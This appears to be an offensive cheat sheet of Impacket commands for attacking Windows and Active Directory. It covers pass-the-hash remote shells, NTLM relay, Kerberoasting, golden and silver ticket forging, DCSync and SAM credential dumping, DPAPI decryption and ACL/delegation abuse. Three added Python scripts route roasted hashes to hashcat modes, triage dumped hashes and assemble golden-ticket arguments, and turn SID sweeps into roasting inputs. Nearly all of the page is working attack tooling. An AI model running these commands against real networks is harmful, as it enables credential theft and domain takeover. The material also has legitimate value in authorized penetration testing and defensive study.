
Impacket — Windows & Active Directory Attacks

Impacket is a Python library with example scripts (packaged on Kali as impacket-*) for SMB, MSRPC, Kerberos, NTLM, WMI and Active Directory attacks.

Jul 2026 lazyhackers
Authentication & Relay (16)
impacket-psexec domain/user:password@10.10.10.1
PSExec — get SYSTEM shell via SMB
psexec smb rce
impacket-psexec domain/user@10.10.10.1 -hashes :NTLMhash
PSExec with pass-the-hash
psexec pth hash
impacket-smbexec domain/user:password@10.10.10.1
SMBExec — service-based exec like PSExec, but no binary is uploaded (each command runs via a service and output is read back through a share)
smbexec smb
impacket-wmiexec domain/user:password@10.10.10.1
WMIExec — code exec via WMI Win32_Process, no service created (output is read back via ADMIN$ unless -nooutput)
wmiexec wmi
impacket-wmiexec domain/user@10.10.10.1 -hashes :NTLMhash
WMIExec pass-the-hash
wmiexec pth
impacket-ntlmrelayx -tf targets.txt -smb2support
NTLM relay to the hosts in targets.txt (only hosts where SMB signing is not required)
ntlmrelayx relay smb
impacket-ntlmrelayx -tf targets.txt -smb2support -i
NTLM relay — each relayed session is exposed as an interactive SMB shell on a local TCP port (first one 127.0.0.1:11000, connect with nc)
ntlmrelayx relay shell
impacket-ntlmrelayx -tf targets.txt -smb2support -e shell.exe
NTLM relay — execute binary on target
ntlmrelayx relay rce
impacket-ntlmrelayx -t ldap://DC01 --escalate-user compromised_user
Relay to LDAP and grant a controlled user privileges (the victim must be privileged; SMB-sourced auth cannot be relayed to LDAP because of the signing flag, so use an HTTP/WebDAV source or --remove-mic on unpatched DCs)
ntlmrelayx ldap privesc
impacket-atexec domain/user:password@10.10.10.1 "whoami /all"
AtExec — command execution via the Task Scheduler service
atexec rce tasksched
impacket-dcomexec domain/user:password@10.10.10.1
DCOMExec — code exec via DCOM (MMC20 / ShellWindows / ShellBrowserWindow)
dcomexec dcom rce
impacket-ntlmrelayx -tf targets.txt -smb2support --remove-mic
Drop-the-MIC (CVE-2019-1040): strip the MIC so SMB-sourced auth can be relayed to LDAP (unpatched DCs only)
ntlmrelayx relay cve-2019-1040
impacket-ntlmrelayx -t ldaps://DC01 --delegate-access
Relay machine auth to LDAPS, create a new computer account (needs MachineAccountQuota > 0; add --escalate-user to reuse an existing one) and grant it RBCD over the relayed computer
ntlmrelayx relay rbcd ldap
impacket-ntlmrelayx -t ldaps://DC01 --shadow-credentials --shadow-target victim$
Relay to LDAPS and add Shadow Credentials (msDS-KeyCredentialLink)
ntlmrelayx relay shadowcreds
impacket-ntlmrelayx -t http://10.10.10.1/certsrv/certfnsh.asp --adcs --template DomainController
ESC8 — relay auth to AD CS web enrollment (HTTP without EPA) and mint a certificate; use the DomainController template for relayed DC auth, Machine for workstations
ntlmrelayx relay adcs esc8
impacket-ntlmrelayx -tf targets.txt -smb2support -socks
Hold relayed sessions in a SOCKS proxy pool for later use
ntlmrelayx relay socks
Kerberos Attacks (13)
impacket-GetUserSPNs domain.local/user:password -dc-ip 10.10.10.1 -request -outputfile kerberoast.txt
Kerberoasting — request a TGS for every user account with an SPN and save the hashes (hashcat -m 13100 for RC4, 19700 for AES256)
kerberoast kerberos spn
impacket-GetNPUsers domain.local/ -usersfile users.txt -no-pass -dc-ip 10.10.10.1
AS-REP Roasting — accounts with DONT_REQ_PREAUTH from a username list, no creds needed (hashcat -m 18200)
asrep kerberos roasting
impacket-GetNPUsers domain.local/user:password -request -dc-ip 10.10.10.1
AS-REP Roast every account with pre-auth disabled (enumerated via LDAP, so valid creds are needed; an anonymous bind rarely works)
asrep kerberos
impacket-ticketer -nthash NTLMhash -domain-sid S-1-5-21-xxx -domain domain.local -spn cifs/server.domain.local user
Forge a Silver Ticket for one service (needs the NT hash of the account that owns the SPN)
silver-ticket kerberos forge
impacket-ticketer -nthash krbtgt_hash -domain-sid S-1-5-21-xxx -domain domain.local administrator
Forge a Golden Ticket (krbtgt NT hash, or -aesKey); since the Nov 2021 KDC hardening the user must exist and -user-id must match its RID (default 500 fits Administrator)
golden-ticket kerberos forge
export KRB5CCNAME=/tmp/ticket.ccache && impacket-psexec -k -no-pass domain.local/user@server
Pass-the-Ticket: point KRB5CCNAME at the .ccache and auth with -k -no-pass (target must be the hostname in the ticket's SPN, not an IP)
ptt kerberos ticket
impacket-getTGT domain.local/user:password -dc-ip 10.10.10.1
Request a TGT and save it as a .ccache (then export KRB5CCNAME)
kerberos tgt ccache
impacket-getST -spn cifs/srv.domain.local domain.local/svc_user:password -impersonate Administrator -dc-ip 10.10.10.1
S4U2Self+S4U2Proxy — svc_user must have the SPN in msDS-AllowedToDelegateTo; -altservice swaps the service class of the resulting ticket
kerberos s4u delegation
impacket-getST -spn cifs/target.domain.local -impersonate Administrator "domain.local/EVILPC$" -hashes :NTLMhash -dc-ip 10.10.10.1
RBCD — as the account listed in the target's msDS-AllowedToActOnBehalfOfOtherIdentity, request a service ticket as the impersonated user (accounts marked sensitive / in Protected Users cannot be impersonated)
kerberos rbcd s4u
impacket-ticketer -nthash SVC_NTLMhash -domain-sid S-1-5-21-xxx -domain domain.local -spn MSSQLSvc/sql.domain.local -user-id 500 administrator
Silver ticket for MSSQL with an explicit RID in the PAC (forged offline, never contacts the DC)
kerberos silver forge
impacket-raiseChild child.domain.local/childadmin:password
Child → parent domain escalation (auto golden + cross-domain)
kerberos raisechild escalation
impacket-ticketConverter ticket.kirbi ticket.ccache
Convert Rubeus .kirbi ↔ Impacket .ccache ticket formats
kerberos convert ccache
impacket-describeTicket ticket.ccache
Decode and inspect a ccache/kirbi ticket (flags, keys, PAC)
kerberos inspect
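GetUserSPNs and GetNPUsers print one hash per account in the `$krb5tgs$…` / `$krb5asrep$…` formats, and hashcat wants a separate run per encryption type. The following is an added example, not part of the cheatsheet or of Impacket: it recognises both line formats, validates the checksum length for the etype, maps each line to the right hashcat mode and groups lines per mode. The sample hashes are constructed (real shapes, filler hex).

```python
"""Sort Kerberoast / AS-REP roast lines into hashcat runs by etype."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# hashcat mode per (message, etype). etype 23 = RC4-HMAC, 17 = AES128-CTS,
# 18 = AES256-CTS. RC4 is a single HMAC-MD5 round and cracks orders of
# magnitude faster than the PBKDF2-based AES types.
TGS_MODES = {23: 13100, 17: 19600, 18: 19700}
ASREP_MODES = {23: 18200, 17: 32100, 18: 32200}

# TGS-REP as printed by GetUserSPNs -request. impacket wraps "user$realm$spn"
# in stars for etype 23 but only the SPN for etype 17/18.
TGS_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$\*?(?P<user>[^$*]+)\$(?P<realm>[^$*]+)\$"
    r"\*?(?P<spn>[^$*]+)\*\$(?P<checksum>[0-9a-f]+)\$(?P<edata>[0-9a-f]+)$",
    re.IGNORECASE,
)
# AS-REP as printed by GetNPUsers. -format hashcat carries the etype,
# -format john omits it (RC4 only), so a missing etype means 23.
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?:(?P<etype>\d+)\$)?(?P<user>[^@$]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-f]+)\$(?P<edata>[0-9a-f]+)$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class RoastHash:
    kind: str            # "tgs" (Kerberoast) or "asrep" (AS-REP roast)
    etype: int
    user: str
    realm: str
    spn: Optional[str]   # only TGS lines name the service
    mode: int            # hashcat -m


def _check_checksum(checksum: str, etype: int) -> None:
    # RC4 lines carry the 16-byte checksum, AES lines the 12-byte trailer.
    want = 32 if etype == 23 else 24
    if len(checksum) != want:
        raise ValueError(f"etype {etype}: expected {want} hex checksum chars, got {len(checksum)}")


def classify(line: str) -> RoastHash:
    """Identify one roasted line and pick the hashcat mode for it."""
    line = line.strip()
    if m := TGS_RE.match(line):
        etype = int(m["etype"])
        if etype not in TGS_MODES:
            raise ValueError(f"unsupported TGS etype {etype}")
        _check_checksum(m["checksum"], etype)
        return RoastHash("tgs", etype, m["user"], m["realm"], m["spn"], TGS_MODES[etype])
    if m := ASREP_RE.match(line):
        etype = int(m["etype"] or 23)
        if etype not in ASREP_MODES:
            raise ValueError(f"unsupported AS-REP etype {etype}")
        _check_checksum(m["checksum"], etype)
        return RoastHash("asrep", etype, m["user"], m["realm"], None, ASREP_MODES[etype])
    raise ValueError(f"not a krb5tgs/krb5asrep line: {line[:32]!r}")


def bucket_for_hashcat(lines):
    """Group lines by mode: hashcat accepts exactly one -m per invocation."""
    buckets = defaultdict(list)
    for line in lines:
        # skip blanks, comments and impacket's "[*] ..." status output
        if line.strip() and not line.lstrip().startswith(("#", "[")):
            buckets[classify(line).mode].append(line.strip())
    return dict(buckets)


# Constructed sample output (the shapes are real, the hex is filler; a real
# edata field is several hundred bytes long).
SAMPLE = [
    "$krb5tgs$23$*svc_sql$DOMAIN.LOCAL$MSSQLSvc/sql.domain.local:1433*$" + "ab" * 16 + "$" + "cd" * 32,
    "$krb5tgs$18$svc_http$DOMAIN.LOCAL$*http/web.domain.local*$" + "ef" * 12 + "$" + "01" * 32,
    "$krb5asrep$23$j.doe@DOMAIN.LOCAL:" + "12" * 16 + "$" + "34" * 32,
]

if __name__ == "__main__":
    for mode, hashes in sorted(bucket_for_hashcat(SAMPLE).items()):
        print(f"hashcat -m {mode} -a 0 mode_{mode}.txt wordlist.txt  # {len(hashes)} hash(es)")
```

Feed it the -outputfile from GetUserSPNs or the stdout of GetNPUsers; a checksum-length mismatch means a truncated or hand-edited line that hashcat would otherwise reject with a less helpful error.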
Credential Dumping (10)
impacket-secretsdump domain/user:password@10.10.10.1
Dump SAM hashes, LSA secrets and DCC2 cached domain creds remotely (needs local admin)
secretsdump creds dump
impacket-secretsdump domain/user@10.10.10.1 -hashes :NTLMhash
secretsdump with pass-the-hash
secretsdump pth
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
Offline NTDS.dit dump (local files)
secretsdump ntds offline
impacket-secretsdump domain/admin@DC01 -just-dc-ntlm
DCSync — NTLM hashes only, via DRSUAPI replication (needs DA or the DS-Replication-Get-Changes / -All rights)
dcsync ntlm da
impacket-secretsdump domain/admin:password@10.10.10.1 -just-dc -history
Full DCSync — NTLM hashes + Kerberos keys (incl. krbtgt); -history adds the password history entries
dcsync secretsdump ntds
impacket-secretsdump domain/admin:password@10.10.10.1 -just-dc-user krbtgt
Targeted DCSync — pull only krbtgt (for golden tickets)
dcsync krbtgt
impacket-secretsdump domain/admin:password@10.10.10.1 -use-vss
Dump NTDS.dit by creating a Volume Shadow Copy with vssadmin (noisier and slower than DRSUAPI, but avoids replication traffic)
secretsdump vss ntds
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
Offline parse of exported registry hives (SAM hashes, LSA secrets, DCC2 cached creds)
secretsdump offline sam
impacket-dpapi masterkey -file mkfile -sid S-1-5-21-xxx -password Passw0rd
Decrypt a user's DPAPI masterkey with their password and SID (use -pvk with the domain backup key instead when you hold it)
dpapi decrypt
impacket-dpapi credential -file cred.blob -key 0xDECRYPTED_MASTERKEY
Decrypt a DPAPI credential blob with a recovered masterkey
dpapi credentials
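A DCSync or hive dump is only useful once triaged: which accounts share a password, who has a blank one, who rolled back to an old password, and which krbtgt secret and RID a golden ticket needs. The following is an added example, not part of the cheatsheet or of Impacket. It parses the `domain\user:rid:lm:nt:::` and `domain\user:etype:key` lines secretsdump prints, skips machine accounts when looking for reuse (their passwords are random), and assembles the ticketer arguments with the RID taken from the dump itself, because the KDC now rejects forged tickets whose user or RID does not exist. The sample dump is constructed; the two reused hashes are the well-known NT hashes of "password" and "Password1".

```python
"""Triage secretsdump output: reuse, blank passwords, history reverts, krbtgt."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# domain\user:rid:lmhash:nthash:::   (SAM dumps have no "domain\" prefix)
NTLM_RE = re.compile(
    r"^(?:[^\\:]+\\)?(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)
# domain\user:aes256-cts-hmac-sha1-96:key   (the "Kerberos keys grabbed" block)
KEY_RE = re.compile(r"^(?:[^\\:]+\\)?(?P<user>[^:]+):(?P<etype>[a-z0-9-]+):(?P<key>[0-9a-f]+)$", re.IGNORECASE)
HIST_RE = re.compile(r"^(?P<base>.+)_history\d+$")  # -history appends _history0, _history1, ...


@dataclass
class Report:
    reused: dict = field(default_factory=dict)    # nt hash -> sorted accounts sharing it
    blank: list = field(default_factory=list)     # accounts with an empty password
    reverted: list = field(default_factory=list)  # current hash equals one in their history
    rids: dict = field(default_factory=dict)      # account -> RID (ticketer -user-id)
    krbtgt_nt: str = ""
    krbtgt_aes256: str = ""


def triage(lines) -> Report:
    rep = Report()
    by_nt, history, current = defaultdict(set), defaultdict(set), {}
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("["):      # [*] / [-] status output
            continue
        if m := NTLM_RE.match(line):
            user, nt = m["user"], m["nt"].lower()
            if h := HIST_RE.match(user):
                history[h["base"]].add(nt)
                continue
            current[user] = nt
            rep.rids[user] = int(m["rid"])
            if nt == EMPTY_NT:
                rep.blank.append(user)
            if user.lower() == "krbtgt":
                rep.krbtgt_nt = nt
            if not user.endswith("$"):            # machine passwords are random: not a reuse signal
                by_nt[nt].add(user)
        elif m := KEY_RE.match(line):
            if m["user"].lower() == "krbtgt" and m["etype"].lower() == "aes256-cts-hmac-sha1-96":
                rep.krbtgt_aes256 = m["key"].lower()
    rep.reused = {nt: sorted(users) for nt, users in by_nt.items() if len(users) > 1}
    rep.reverted = sorted(u for u, old in history.items() if current.get(u) in old)
    return rep


def golden_ticket_args(rep: Report, domain: str, domain_sid: str, user: str = "Administrator"):
    """impacket-ticketer arguments from a triaged DCSync. Prefers the AES256 key
    (an RC4-only ticket stands out in Kerberos logs); the RID is taken from the
    dump because the KDC rejects tickets whose user or RID does not match AD."""
    if user not in rep.rids:
        raise ValueError(f"{user} is not in the dump; the KDC would reject a ticket for it")
    key = ["-aesKey", rep.krbtgt_aes256] if rep.krbtgt_aes256 else ["-nthash", rep.krbtgt_nt]
    if not key[1]:
        raise ValueError("no krbtgt secret in the dump")
    return key + ["-domain-sid", domain_sid, "-domain", domain, "-user-id", str(rep.rids[user]), user]


# Constructed sample in secretsdump's output format.
SAMPLE = r"""
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
domain.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
domain.local\Administrator_history0:500:aad3b435b51404eeaad3b435b51404ee:5835048ce94ad0564e29a924a03510ef:::
domain.local\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
domain.local\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3ebb4b3f3d1d22a7b3a8f1c5f6e8c9d0:::
domain.local\svc_sql:1105:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
domain.local\j.doe:1108:aad3b435b51404eeaad3b435b51404ee:a4f49c406510bdcab6824ee7c30fd852:::
domain.local\j.doe_history0:1108:aad3b435b51404eeaad3b435b51404ee:a4f49c406510bdcab6824ee7c30fd852:::
domain.local\DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0f1e2d3c4b5a69788796a5b4c3d2e1f0:::
[*] Kerberos keys grabbed
domain.local\krbtgt:aes256-cts-hmac-sha1-96:""" + "aa" * 32 + r"""
domain.local\krbtgt:aes128-cts-hmac-sha1-96:""" + "bb" * 16 + r"""
[*] Cleaning up...
"""

if __name__ == "__main__":
    rep = triage(SAMPLE.splitlines())
    print("reuse:", rep.reused)
    print("blank:", rep.blank, "reverted:", rep.reverted)
    print("impacket-ticketer", " ".join(golden_ticket_args(rep, "domain.local", "S-1-5-21-xxx")))
```

Run it over the output of `-just-dc -history`; with `-just-dc-ntlm` there are no Kerberos keys, so the ticket falls back to `-nthash`.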
Enumeration & SMB (13)
impacket-smbclient domain/user:password@10.10.10.1
Interactive SMB client
smb enum
impacket-smbclient domain/user@10.10.10.1 -hashes :NTLMhash
SMB client with hash
smb pth
impacket-lookupsid domain/user:password@10.10.10.1
Enumerate users/groups by brute-forcing RIDs over LSARPC (also prints the domain SID; often works with a null session; -maxRid raises the default 4000)
enum sid users
impacket-rpcdump domain/user:password@10.10.10.1
Dump RPC endpoints from the endpoint mapper (works unauthenticated; MS-RPRN in the list means the Print Spooler is reachable)
rpc enum
impacket-reg domain/user:password@10.10.10.1 query -keyName "HKLM\SAM"
Remote registry query (starts the Remote Registry service over SCMR if it is stopped)
registry enum
impacket-mssqlclient domain/user:password@10.10.10.1
MSSQL interactive client
mssql database
impacket-mssqlclient domain/user:password@10.10.10.1 -windows-auth
MSSQL with Windows auth
mssql windows-auth
impacket-GetADUsers -all domain.local/user:password -dc-ip 10.10.10.1
List all domain users with last-logon / pwd-last-set
enum ldap users
impacket-samrdump domain/user:password@10.10.10.1
Enumerate users, groups and aliases via MS-SAMR
enum samr
impacket-findDelegation domain.local/user:password -dc-ip 10.10.10.1
Enumerate unconstrained / constrained / RBCD delegation
enum delegation
impacket-services domain/user:password@10.10.10.1 list
List / start / stop / create remote Windows services
enum services
impacket-smbserver share /tmp/share -smb2support
Host an SMB share for file transfer; NTLMv2 hashes of clients that authenticate to it are printed (-smb2support is required for current Windows clients)
smbserver relay transfer
impacket-Get-GPPPassword "domain/user:password@10.10.10.1"
Recover cPassword secrets from Group Policy Preferences (MS14-025)
gpp cpassword sysvol
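lookupsid output feeds two later steps on this page: the user names go into the file for `GetNPUsers -usersfile`, and the `Domain SID is:` line is the `-domain-sid` value ticketer wants. The following is an added example, not part of the cheatsheet or of Impacket. It parses the `rid: NETBIOS\name (SidTypeX)` lines, separates users, computers and groups, flags renamed well-known accounts (a RID 500 account not called Administrator), and warns when the highest RID found sits close to `-maxRid`, which usually means the sweep stopped before the last accounts. The sample output is constructed; the 200-RID warning window is a heuristic of this example.

```python
"""Parse impacket-lookupsid output into roasting / ticketing inputs."""
import re
from dataclasses import dataclass, field

SID_RE = re.compile(r"^\[\*\] Domain SID is: (?P<sid>S-1-5-21-\d+-\d+-\d+)$")
# "1105: DOMAIN\svc_sql (SidTypeUser)"; names may contain spaces
ENTRY_RE = re.compile(r"^(?P<rid>\d+): (?P<netbios>[^\\]+)\\(?P<name>.+?) \((?P<type>SidType\w+)\)$")

# Default names of well-known RIDs. Localised domains legitimately differ, so
# a mismatch is a hint that an admin account was renamed, not proof.
WELL_KNOWN = {500: "Administrator", 501: "Guest", 502: "krbtgt",
              512: "Domain Admins", 519: "Enterprise Admins"}


@dataclass
class SidSweep:
    domain_sid: str = ""
    netbios: str = ""
    users: list = field(default_factory=list)      # SidTypeUser without a trailing $
    computers: list = field(default_factory=list)  # SidTypeUser ending in $
    groups: list = field(default_factory=list)     # SidTypeGroup / SidTypeAlias
    rids: dict = field(default_factory=dict)       # name -> RID
    max_rid: int = 0


def parse_lookupsid(lines) -> SidSweep:
    sweep = SidSweep()
    for raw in lines:
        line = raw.strip()
        if m := SID_RE.match(line):
            sweep.domain_sid = m["sid"]
        elif m := ENTRY_RE.match(line):
            rid, name, kind = int(m["rid"]), m["name"], m["type"]
            sweep.netbios = sweep.netbios or m["netbios"]
            sweep.rids[name] = rid
            sweep.max_rid = max(sweep.max_rid, rid)
            if kind == "SidTypeUser":
                (sweep.computers if name.endswith("$") else sweep.users).append(name)
            elif kind in ("SidTypeGroup", "SidTypeAlias"):
                sweep.groups.append(name)
    return sweep


def renamed_well_known(sweep: SidSweep) -> dict:
    """RID -> (expected name, actual name) for well-known RIDs that were renamed."""
    by_rid = {rid: name for name, rid in sweep.rids.items()}
    return {rid: (want, by_rid[rid]) for rid, want in WELL_KNOWN.items()
            if rid in by_rid and by_rid[rid] != want}


def sweep_truncated(sweep: SidSweep, max_rid_arg: int = 4000, window: int = 200) -> bool:
    """lookupsid stops at -maxRid (default 4000). A highest hit within `window`
    of that limit suggests more accounts exist above it; rerun with a higher -maxRid."""
    return sweep.max_rid >= max_rid_arg - window


# Constructed sample in lookupsid's output format.
SAMPLE = r"""
[*] Brute forcing SIDs at 10.10.10.1
[*] StringBinding ncacn_np:10.10.10.1[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1234567890-987654321-1122334455
498: DOMAIN\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: DOMAIN\Administrator (SidTypeUser)
501: DOMAIN\Guest (SidTypeUser)
502: DOMAIN\krbtgt (SidTypeUser)
512: DOMAIN\Domain Admins (SidTypeGroup)
513: DOMAIN\Domain Users (SidTypeGroup)
1000: DOMAIN\DC01$ (SidTypeUser)
1105: DOMAIN\svc_sql (SidTypeUser)
1108: DOMAIN\j.doe (SidTypeUser)
3950: DOMAIN\WKS42$ (SidTypeUser)
""".splitlines()

if __name__ == "__main__":
    sweep = parse_lookupsid(SAMPLE)
    print("\n".join(sweep.users))            # -> users.txt for GetNPUsers -usersfile
    print("domain SID:", sweep.domain_sid)   # -> ticketer -domain-sid
    if sweep_truncated(sweep):
        print(f"highest RID {sweep.max_rid} is near -maxRid 4000; rerun with -maxRid 10000")
```

Pipe the user list into GetNPUsers and keep the domain SID for ticketer; the truncation check is worth running on any domain older than a few years, where RIDs above 4000 are normal.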
ACL & Delegation Abuse (6)
impacket-dacledit -action write -rights DCSync -principal attacker -target-dn 'DC=domain,DC=local' domain.local/admin:password
Grant DCSync rights to a controlled principal (DACL abuse)
acl dacledit dcsync
impacket-dacledit -action read -principal attacker -target victimuser domain.local/user:password
Read the ACEs in an object DACL
acl dacledit
impacket-owneredit -action write -new-owner attacker -target victimobject domain.local/user:password
Take ownership of an object (WriteOwner abuse)
acl owneredit writeowner
impacket-changepasswd domain.local/victim@10.10.10.1 -newpass 'NewP@ss1' -altuser attacker -altpass Pass -reset
Force-reset a target password (ForceChangePassword / GenericAll ACL)
acl changepasswd reset
impacket-addcomputer -computer-name 'EVILPC$' -computer-pass Passw0rd domain.local/user:password -dc-ip 10.10.10.1
Add a machine account (consumes one of the caller's MachineAccountQuota, default 10) for RBCD / shadow-creds
rbcd addcomputer maq
impacket-rbcd -delegate-from 'EVILPC$' -delegate-to 'TARGET$' -action write domain.local/user:password -dc-ip 10.10.10.1
Write msDS-AllowedToActOnBehalfOfOtherIdentity (configure RBCD)
rbcd delegation